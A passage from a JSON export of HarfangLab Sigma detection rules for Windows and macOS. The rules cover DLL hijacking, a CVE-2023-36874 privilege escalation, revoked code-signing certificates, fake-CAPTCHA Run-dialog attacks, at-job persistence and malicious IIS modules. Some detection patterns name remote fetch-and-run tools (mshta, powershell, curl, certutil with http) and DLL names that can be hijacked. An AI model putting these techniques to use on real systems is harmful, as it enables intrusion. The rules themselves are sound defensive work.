attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdsched.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\bcd.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0a708087-9ef8-4db8-b5a9-84d30391d776", + "rule_name": "DLL Hijacking via mdsched.exe", + "rule_description": "Detects potential Windows DLL Hijacking via mdsched.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": 
"0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0a956b02-3359-4969-9418-cfa7e8279f9e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.609800Z", + "creation_date": "2026-03-23T11:45:34.609803Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.609811Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36874", + "https://attack.mitre.org/techniques/T1068/" + ], + "name": "t1068_wer_service_vulnerability.yml", + "content": "title: WER Service CVE-2023-36874 Vulnerability Exploited\nid: 0a956b02-3359-4969-9418-cfa7e8279f9e\ndescription: |\n Detects exploitation of CVE-2023-36874 a vulnerability affecting the Windows Error Reporting (WER) component.\n Microsoft Windows Error Reporting Service contains a vulnerability that allows a local user, without administrator privileges, to escalate as SYSTEM.\n It is recommended to investigate if the exploitation was successful by looking at integrity level of the process that triggered the alert.\nreferences:\n - 
https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36874\n - https://attack.mitre.org/techniques/T1068/\ndate: 2023/08/24\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2023-36874\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-36874\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\wermgr.exe'\n # C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wercplsupport\n ParentImage: '?:\\Windows\\System32\\svchost.exe'\n ParentCommandLine|contains: 'wercplsupport'\n\n filter_signed:\n OriginalFileName: 'WerMgr'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0a956b02-3359-4969-9418-cfa7e8279f9e", + "rule_name": "WER Service CVE-2023-36874 Vulnerability Exploited", + "rule_description": "Detects exploitation of CVE-2023-36874 a vulnerability affecting the Windows Error Reporting (WER) component.\nMicrosoft Windows Error Reporting Service contains a vulnerability that allows a local user, without administrator privileges, to escalate as SYSTEM.\nIt is recommended to investigate if the exploitation was successful by looking at integrity level of the process that triggered the alert.\n", + "rule_creation_date": "2023-08-24", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1068" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": 
"0a95ac1e-214e-4581-b19e-5ba1e9731861", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.088105Z", + "creation_date": "2026-03-23T11:45:34.088107Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.088111Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware", + "https://attack.mitre.org/techniques/T1553/002/" + ], + "name": "t1553_002_dicol_effluent_revoked_certificate.yml", + "content": "title: Process Executed Signed with Revoked Certificate\nid: 0a95ac1e-214e-4581-b19e-5ba1e9731861\ndescription: |\n Detects the execution of a process signed using a DICOL EFFLUENT revoked certificates.\n Malicious usage of this certificate has already been seen by the threat actor UNC2596.\n It is recommended to terminate processes signed with revoked DICOL EFFLUENT certificates and isolate affected systems.\nreferences:\n - https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/09/27\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - 
classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '3e22bfc34b0718ee1416cc5bf1f7b2b646f5b56a'\n\n condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0a95ac1e-214e-4581-b19e-5ba1e9731861", + "rule_name": "Process Executed Signed with Revoked Certificate", + "rule_description": "Detects the execution of a process signed using a DICOL EFFLUENT revoked certificates.\nMalicious usage of this certificate has already been seen by the threat actor UNC2596.\nIt is recommended to terminate processes signed with revoked DICOL EFFLUENT certificates and isolate affected systems.\n", + "rule_creation_date": "2022-09-27", + "rule_modified_date": "2025-01-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1553.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.623495Z", + "creation_date": "2026-03-23T11:45:34.623497Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.623501Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha", + "https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/", + "https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/", + "https://attack.mitre.org/techniques/T1566/", + "https://attack.mitre.org/techniques/T1204/004/" + ], + "name": "t1204_001_run_command_explorer.yml", + "content": "title: Suspicious Process Executed via Run Prompt\nid: 0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee\ndescription: |\n Detects suspicious programs executed via the Windows Run dialog (Win+R) that are initiated after users interact with fake CAPTCHA verification prompts.\n In this attack vector, users are presented with a fake CAPTCHA verification page displaying an \"I'm not a robot\" checkbox. After clicking the checkbox, users are instructed to execute specific commands via the Windows Run dialog (Win+R). 
Attackers exploit user trust in familiar verification systems to trick them into manually executing malicious commands, which are usually related to LummaStealer.\n It is recommended to investigate the entire process chain following any suspicious Run dialog executions.\nreferences:\n - https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha\n - https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/\n - https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1204/004/\ndate: 2024/11/12\nmodified: 2026/01/30\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1204.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n StackTrace|re: '(?i).*\\|.:\\\\Windows\\\\System32\\\\user32\\.dll!SendMessageW\\+0x[a-f0-9]*$'\n StackTrace|contains:\n - 'CallWindowProcW'\n - 'DispatchMessageW'\n ParentImage|endswith: '\\explorer.exe'\n Image|startswith: '?:\\windows\\'\n # Ensure commandline containes at least a space -> there are some args\n CommandLine|contains: ' '\n\n selection_image:\n - Image:\n - '?:\\Windows\\hh.exe'\n - '?:\\Windows\\System32\\mshta.exe'\n - '?:\\Windows\\SysWOW64\\mshta.exe'\n - '?:\\Windows\\System32\\PresentationHost.exe'\n - '?:\\Windows\\SysWOW64\\PresentationHost.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - Image:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - 
'?:\\windows\\system32\\regsvr32.exe'\n - '?:\\windows\\SysWOW64\\regsvr32.exe'\n - '?:\\windows\\system32\\rundll32.exe'\n - '?:\\windows\\SysWOW64\\rundll32.exe'\n CommandLine|contains: 'http'\n\n selection_cmd:\n Image:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\SysWOW64\\cmd.exe'\n CommandLine|contains:\n - 'mshta'\n - 'PresentationHost'\n - 'powershell'\n - 'msiexec'\n - 'regsvr32'\n - 'rundll32'\n - 'curl'\n - 'certutil'\n\n filter_lnk:\n LnkPath|contains: '?'\n\n exclusion_powershell:\n CommandLine:\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -noprofile'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -Command Start-Process PowerShell -Verb RunAs'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass -File ?:\\\\*\\Scripts\\\\*.ps1'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -Command Start-Process notepad.exe *'\n\n exclusion_msiexec:\n CommandLine|startswith: '?:\\Windows\\system32\\msiexec.exe /* \\\\\\\\*.local\\'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee", + "rule_name": "Suspicious Process Executed via Run Prompt", + "rule_description": "Detects suspicious programs executed via the Windows Run dialog (Win+R) that are initiated after users interact with fake CAPTCHA verification prompts.\nIn this attack vector, users are presented with a fake CAPTCHA verification page displaying an \"I'm not a robot\" checkbox. 
After clicking the checkbox, users are instructed to execute specific commands via the Windows Run dialog (Win+R). Attackers exploit user trust in familiar verification systems to trick them into manually executing malicious commands, which are usually related to LummaStealer.\nIt is recommended to investigate the entire process chain following any suspicious Run dialog executions.\n", + "rule_creation_date": "2024-11-12", + "rule_modified_date": "2026-01-30", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution", + "attack.initial_access" + ], + "rule_technique_tags": [ + "attack.t1204.004", + "attack.t1566" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.093337Z", + "creation_date": "2026-03-23T11:45:34.093339Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.093343Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1053/002/" + ], + "name": 
"t1053_002_at_scheduler_enabled.yml", + "content": "title: At Jobs Enabled via Launchd\nid: 0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5\ndescription: |\n Detects the loading of file related to the `at` utility by launchd.\n Adversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\n It is recommended to check the content of the /var/at/jobs folder for suspicious jobs.\nreferences:\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2024/05/10\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1053.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/launchctl'\n CommandLine|contains|all:\n - 'load'\n - '/com.apple.atrun.plist'\n\n condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5", + "rule_name": "At Jobs Enabled via Launchd", + "rule_description": "Detects the loading of file related to the `at` utility by launchd.\nAdversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\nIt is recommended to check the content of the /var/at/jobs folder for suspicious jobs.\n", + "rule_creation_date": "2024-05-10", + "rule_modified_date": "2025-01-28", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1053.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0ac5fafe-dc2c-42bf-9d26-3882b0df7857", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + 
"rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.599572Z", + "creation_date": "2026-03-23T11:45:34.599576Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.599583Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://wietze.github.io/blog/save-the-environment-variables", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_cidiag.yml", + "content": "title: DLL Hijacking via CIDiag.exe\nid: 0ac5fafe-dc2c-42bf-9d26-3882b0df7857\ndescription: |\n Detects potential Windows DLL Hijacking via CIDiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - 
https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CIDiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0ac5fafe-dc2c-42bf-9d26-3882b0df7857", + "rule_name": "DLL Hijacking via CIDiag.exe", + "rule_description": "Detects potential Windows DLL Hijacking via CIDiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + 
"attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0ad1a87e-1efd-47a3-a74b-3ec148f9992a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.618712Z", + "creation_date": "2026-03-23T11:45:34.618714Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.618718Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_workfolders.yml", + "content": "title: DLL Hijacking via workfolders.exe\nid: 0ad1a87e-1efd-47a3-a74b-3ec148f9992a\ndescription: |\n Detects potential Windows DLL Hijacking via workfolders.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard 
directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'workfolders.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\davclnt.dll'\n - '\\DEVOBJ.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\drprov.dll'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\policymanager.dll'\n - '\\PROPSYS.dll'\n - '\\USERENV.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0ad1a87e-1efd-47a3-a74b-3ec148f9992a", + "rule_name": "DLL Hijacking via workfolders.exe", + "rule_description": "Detects potential Windows DLL Hijacking via workfolders.exe.\nDLL hijacking takes 
advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0ae4376f-360f-4b97-9b3f-4c735a82fbf6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.075904Z", + "creation_date": "2026-03-23T11:45:34.075906Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.075910Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ 
+ "https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#module-reference", + "https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/", + "https://attack.mitre.org/techniques/T1505/004/" + ], + "name": "t1505_004_iis_module_native_load_pre43.yml", + "content": "title: Suspicious IIS Module Loaded\nid: 0ae4376f-360f-4b97-9b3f-4c735a82fbf6\ndescription: |\n Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\n Malicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\n It is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\n This rule applies to agents with version before 4.3, and is maintained for compatibility reasons only.\nreferences:\n - https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#module-reference\n - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n - https://attack.mitre.org/techniques/T1505/004/\ndate: 2023/11/20\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.004\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'w3wp.exe'\n ProcessDescription: 'IIS Worker Process'\n ImageLoaded|re:\n - '(?i)^[A-Z]:\\\\Windows\\\\System32\\\\inetsrv\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\wwwroot\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\temp\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\Program Files\\\\Microsoft\\\\Exchange 
